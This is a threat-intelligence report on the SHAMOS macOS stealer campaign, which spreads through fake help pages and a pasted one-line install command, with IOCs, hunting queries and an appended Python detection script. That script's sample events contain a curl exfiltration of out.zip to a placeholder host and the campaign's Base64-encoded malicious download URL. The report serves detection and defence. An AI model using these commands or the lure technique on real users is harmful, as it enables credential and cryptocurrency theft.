Falcon Platform Prevents COOKIE SPIDER’s SHAMOS Delivery on macOS

Between June and August 2025, the CrowdStrike Falcon® platform successfully blocked a sophisticated malware campaign that attempted to compromise over 300 customer environments. The campaign deployed SHAMOS, a variant of Atomic macOS Stealer (AMOS) developed by the cybercriminal group COOKIE SPIDER.

Operating as malware-as-a-service, COOKIE SPIDER rents this information stealer to cybercriminals who deploy it to harvest sensitive information and cryptocurrency assets from victims. The campaign utilized malvertising to direct users to fraudulent macOS help websites where victims were instructed to execute a malicious one-line installation command.

This campaign underscores the popularity of malicious one-line installation commands among eCrime actors. This technique allows them to bypass Gatekeeper security checks and install the Mach-O executable directly onto victim devices. Cuckoo Stealer and SHAMOS operators have previously leveraged this method in Homebrew malvertising campaigns occurring between May 2024 and January 2025.

Details

In an exemplar campaign from June 2025, when the victim searches for a macOS-related issue — for example, “macos flush resolver cache” — they receive a promoted malvertising website in their search results (Figure 1). Users located in multiple countries — including the U.S., UK, Japan, China, Colombia, Canada, Mexico, Italy, and others — received these advertisements; no victims were located in Russia. This is likely due to the fact that Russian eCrime forums prohibit commodity malware operators from targeting users based in Russia and other countries belonging to the Commonwealth of Independent States (CIS).

Figure 1. Screenshot of search engine results with promoted malvertising website
One Google Advertising profile promoting this spoofed macOS help website appears to be a legitimate Australia-based electronics store, suggesting the eCrime actors responsible are likely spoofing the store name in their Google Advertising profile. This assessment is made with moderate confidence, as this profile’s promoted advertisement URLs appear to relate to macOS help pages — mac-safer[.]com and rescue-mac[.]com — and therefore do not align with the legitimate store’s business operations (Figure 2).
Figure 2. Google advertising profile
The fake help pages provide victims with false instructions for how to fix their problem (Figure 3).
Figure 3. False instructions displayed on macOS help pages
Both malvertising websites instruct the victims to copy, paste, and execute the following command in Terminal (Figure 4):
Figure 4. Malicious one-line installation command displayed on malvertising websites
The command decodes the Base64-encoded string aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo and downloads a file from https[:]//icloudservers[.]com/gm/install[.]sh. This file is a Bash script that captures the user’s password and downloads a SHAMOS Mach-O executable from https[:]//icloudservers[.]com/gm/update (Figure 5).
Figure 5. Bash script contents

Since first reporting on this type of campaign in June 2025, CrowdStrike Counter Adversary Operations has continued to observe opportunistic eCrime threat actors leveraging malicious GitHub repositories to prompt victims to execute commands that download SHAMOS. Similar to the aforementioned activity, campaign operators claim to offer a free download of a tool designed for macOS; these tools include video editing software, computer-aided design (CAD) products, macOS performance tools, AI software, and dictation software.

The threat actor(s) behind these pages continue to use the malicious one-line command to install SHAMOS. In some cases, the command is written entirely in plain text, and in others, the URL that hosts SHAMOS is Base64-encoded (Figure 6). 

Figure 6. Samples of malicious one-line installation commands displayed on malvertising websites throughout July and August 2025

SHAMOS Installation/Execution

The malicious installation command downloads the SHAMOS Mach-O into the /tmp/ directory, removes its extended file attributes using xattr (likely to bypass Gatekeeper checks), assigns executable permissions via chmod, and then executes the stealer. SHAMOS runs anti-VM commands to verify that the Mach-O is not executing in a suspected sandbox environment. The stealer then executes a variety of AppleScript commands for host reconnaissance and data collection, including searching the disk for known cryptocurrency wallet files and sensitive credential files. SHAMOS attempts to exfiltrate the collected data, including Keychain, Apple Notes, and browser data, using curl to transmit it in a ZIP archive named out.zip (Figure 7).

Figure 7. Falcon UI detection on the binary execution from tmp
SHAMOS downloads additional malicious payloads, including a spoofed Ledger Live wallet application and a botnet module, to the victim’s home directory as hidden files and assigns them executable permissions. The stealer also configures a Plist file named com.finder.helper.plist for persistence and saves it to the user’s LaunchDaemons directory if the victim has sudo privileges. CrowdStrike observed multiple curl commands, likely suggesting the eCrime actor was using SHAMOS’s botnet module (Figure 8).
Figure 8. Falcon UI detection demonstrating likely botnet module use

Additional Reporting

Open-source reporting detailed an additional malvertising campaign related to the observed activity. This campaign involved a GitHub repository masquerading as iTerm2’s GitHub repository, located at https[:]//github[.]com/jeryrymoore/Iterm2, that contained instructions detailing how to download iTerm2, a terminal emulator for macOS (Figure 9).[1]

The malicious one-line installation command is nearly identical to the command used in the malvertising campaign; however, the campaign’s Bash script host URL is not Base64-encoded. The Bash script — retrieved from https[:]//macostutorial[.]com/iterm2/install[.]sh — downloads SHAMOS from https[:]//macostutorial[.]com/iterm2/update.

Figure 9. GitHub repository containing fake iTerm2 installation instructions

CrowdStrike Falcon Coverage

CrowdStrike employs a layered approach to malware detection using machine learning and indicators of attack (IOAs). As shown in Figure 10, the CrowdStrike Falcon® sensor’s machine learning and behavior-based (IOA) detection capabilities can automatically detect and prevent SHAMOS in the initial stages of the attack chain (i.e., as soon as the malware is downloaded onto the victim’s machine and when the malicious shell script executes). Additionally, IOAs can recognize malicious behavior at later stages of the attack chain, including when the threat actor attempts data collection, persistence, execution of further binaries, and data exfiltration.

Figure 10. Falcon UI detection on execution of Bash script

Assessment

This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors. Promoting the fraudulent websites through advertising drives more traffic to them, which means more potential victims. The one-line installation command enables eCrime actors to install the Mach-O executable directly onto the victim’s machine while bypassing Gatekeeper checks.

CrowdStrike Counter Adversary Operations assesses that eCrime actors will likely continue to leverage both malvertising and one-line installation commands to distribute macOS information stealers. This assessment is made with high confidence, as the combination has historically been successful, and these methods allow actors to bypass Gatekeeper checks.

Recommended Prevention Settings

To protect endpoints from this threat, CrowdStrike Falcon® Insight XDR customers should ensure the following prevention policy settings are configured:

  • Suspicious process prevention
  • Intelligence-sourced threat prevention

Threat Hunting Queries 

The following CrowdStrike Falcon® Next-Gen SIEM Advanced Event Search queries are provided to assist defenders in hunting for this and similar activity across their endpoints.

NOTE: Make sure to update the Falcon URL to the cloud in which your environment is currently configured (US1, US2, EU, etc.)

“Bash script execution with calls to risky LOOBINs”

event_platform=Mac #event_simpleName=ScriptControlScanInfo ScriptContent="*dscl*curl*xattr*chmod*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ScriptContent])

“AppleScript execution under a binary from /tmp/”

event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*/tmp/*"
| join({event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*osascript" CommandLine="*-e*" | rename(field="CommandLine", as="ChildCommandLine") | rename(field="ImageFileName", as="ChildImageFileName")}, field=TargetProcessId, key=ParentProcessId, include=["ChildImageFileName", "ChildCommandLine"], limit=20000)
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine, ChildImageFileName, ChildCommandLine])

“Curl with commandline indicative of data exfil”

event_platform=Mac #event_simpleName=ProcessRollup2 FileName=curl CommandLine="*POST*out.zip*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine])
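For teams that want to replay the same logic outside the Falcon console, the following Python script is an added example (it is not CrowdStrike code and is not part of the original post) that serves two passages above: the SHAMOS installation/execution chain (curl into /tmp/, xattr, chmod, execution from /tmp/, an osascript -e child, and a curl POST of out.zip) and the three hunting queries. It correlates that chain per host across a small set of constructed process events shaped like the fields the queries use (aid, process and parent IDs, image path, command line), and it decodes Base64 tokens found on command lines, returning any URL they hide in the same defanged style the report uses; the Base64 string from the one-line command resolves this way to the install.sh host URL. The event records, the PLACEHOLDER.invalid and example.invalid hosts, the stage names, and the three-stage alert threshold are all assumptions made for this example.

```python
import base64
import re
from collections import defaultdict

# Candidate Base64 tokens: long runs of the Base64 alphabet, optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Paths under /tmp/ (or /private/tmp/) named on a command line.
TMP_PATH = re.compile(r"/(?:private/)?tmp/[\w.\-/]+")
# Chain stages in the order the report describes them (stage names are assumptions).
STAGES = ("download_to_tmp", "xattr_strip", "chmod_exec",
          "tmp_exec", "applescript_child", "curl_post_zip")

def defang(url):
    """Write a URL in the report's defanged style so it is safe to paste into a ticket."""
    return url.replace("://", "[:]//", 1).replace(".", "[.]")

def decode_b64_urls(text):
    """Return defanged URLs for every Base64 token in text that decodes to an http(s) URL."""
    found = []
    for token in B64_TOKEN.findall(text):
        if len(token) % 4:  # not a whole number of Base64 quanta: skip cheaply
            continue
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except ValueError:  # bad alphabet or padding, or a non-ASCII payload
            continue
        if decoded.startswith(("http://", "https://")):
            found.append(defang(decoded))
    return found

def find_stager_chains(events, min_stages=3):
    """Correlate per-host process events into the chain: curl into /tmp/, xattr,
    chmod, execution from /tmp/, osascript -e child, curl POST of out.zip.
    Events carry aid, ts, pid, ppid, image, cmdline (a constructed shape that
    mirrors aid, TargetProcessId, ParentProcessId, ImageFileName, CommandLine).
    A host is reported once min_stages stages are seen (threshold is an assumption)."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["aid"]].append(ev)
    findings = []
    for aid, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        pid_image = {e["pid"]: e["image"] for e in evs}
        seen, urls, tmp_paths = [], [], set()
        for e in evs:
            name = e["image"].rsplit("/", 1)[-1]
            cmd = e["cmdline"]
            urls.extend(decode_b64_urls(cmd))
            paths = set(TMP_PATH.findall(cmd))
            stage = None
            if name == "curl" and "POST" in cmd and "out.zip" in cmd:
                stage = "curl_post_zip"
            elif name == "curl" and paths:
                tmp_paths |= paths          # remember what curl dropped under /tmp/
                stage = "download_to_tmp"
            elif name == "xattr" and paths & tmp_paths:
                stage = "xattr_strip"
            elif name == "chmod" and paths & tmp_paths:
                stage = "chmod_exec"
            elif e["image"] in tmp_paths:
                stage = "tmp_exec"
            elif (name == "osascript" and "-e" in cmd.split()
                  and pid_image.get(e["ppid"]) in tmp_paths):
                stage = "applescript_child"  # AppleScript spawned by the /tmp/ binary
            if stage and stage not in seen:
                seen.append(stage)
        if len(seen) >= min_stages:
            findings.append({"aid": aid, "stages": seen, "urls": sorted(set(urls))})
    return findings

# Constructed sample telemetry; none of it is from the report. PLACEHOLDER.invalid
# stands in for the real hosts. host-1 shows the full chain, host-2 is benign.
SAMPLE_EVENTS = [
    {"aid": "host-1", "ts": 1, "pid": 10, "ppid": 1, "image": "/bin/bash",
     "cmdline": "bash -c echo aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo | base64 -d"},
    {"aid": "host-1", "ts": 2, "pid": 11, "ppid": 10, "image": "/usr/bin/curl",
     "cmdline": "curl -o /tmp/update https://PLACEHOLDER.invalid/gm/update"},
    {"aid": "host-1", "ts": 3, "pid": 12, "ppid": 10, "image": "/usr/bin/xattr",
     "cmdline": "xattr -c /tmp/update"},
    {"aid": "host-1", "ts": 4, "pid": 13, "ppid": 10, "image": "/bin/chmod",
     "cmdline": "chmod +x /tmp/update"},
    {"aid": "host-1", "ts": 5, "pid": 14, "ppid": 10, "image": "/tmp/update",
     "cmdline": "/tmp/update"},
    {"aid": "host-1", "ts": 6, "pid": 15, "ppid": 14, "image": "/usr/bin/osascript",
     "cmdline": "osascript -e <applescript omitted>"},
    {"aid": "host-1", "ts": 7, "pid": 16, "ppid": 14, "image": "/usr/bin/curl",
     "cmdline": "curl -X POST -F data=@/tmp/out.zip https://PLACEHOLDER.invalid/collect"},
    {"aid": "host-2", "ts": 1, "pid": 20, "ppid": 1, "image": "/usr/bin/curl",
     "cmdline": "curl -o /tmp/release.tgz https://example.invalid/release.tgz"},
    {"aid": "host-2", "ts": 2, "pid": 21, "ppid": 1, "image": "/usr/bin/osascript",
     "cmdline": "osascript -e 'display notification \"build done\"'"},
]

if __name__ == "__main__":
    for f in find_stager_chains(SAMPLE_EVENTS):
        print(f["aid"], "->", ", ".join(f["stages"]), "| urls:", f["urls"])
```

Run against the constructed events, host-1 is reported with all six stages and the decoded, defanged install.sh URL, while host-2 (a curl into /tmp/ and an unrelated osascript -e under a non-/tmp/ parent) stays below the threshold. The per-path state (tmp_paths) is what keeps the xattr and chmod stages tied to the file curl actually wrote, rather than firing on any xattr or chmod on the host; raise or lower min_stages to trade recall against noise in your own telemetry.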

Indicators of Compromise (IOCs)

IOC | Description
mac-safer[.]com | Malvertising website containing instructions to download SHAMOS
rescue-mac[.]com | Malvertising website containing instructions to download SHAMOS
https[:]//github[.]com/jeryrymoore/Iterm2 | Malvertising website containing instructions to download SHAMOS
231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbbf547f | Bash script SHA256 hash
eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68 | Bash script SHA256 hash
4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f | SHAMOS Mach-O SHA256 hash
b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5 | SHAMOS Mach-O SHA256 hash
a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322 | SHAMOS Mach-O SHA256 hash
https[:]//icloudservers[.]com/gm/install[.]sh | Bash script host URL
https[:]//macostutorial[.]com/iterm2/install[.]sh | Bash script host URL
https[:]//icloudservers[.]com/gm/update | SHAMOS host URL
https[:]//macostutorial[.]com/iterm2/update | SHAMOS host URL

MITRE ATT&CK Framework

The following table maps reported COOKIE SPIDER and SHAMOS tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK® framework.

ID | Technique | Description
T1583.001 | Acquire Infrastructure: Domains | The eCrime actor registered fake macOS help websites
T1189 | Drive-by Compromise | Malvertising distributes websites containing SHAMOS installation instructions
T1204 | User Execution | SHAMOS requires the user to execute the malicious installer command
T1027.010 | Obfuscated Files or Information: Command Obfuscation | The malicious command uses Base64 encoding to obfuscate the Bash script download URL
T1105 | Ingress Tool Transfer | The malicious Bash script downloads SHAMOS from an external URL

Additional Resources

1. The legitimate iTerm2 GitHub repository is located at https[:]//github[.]com/gnachman/iTerm2.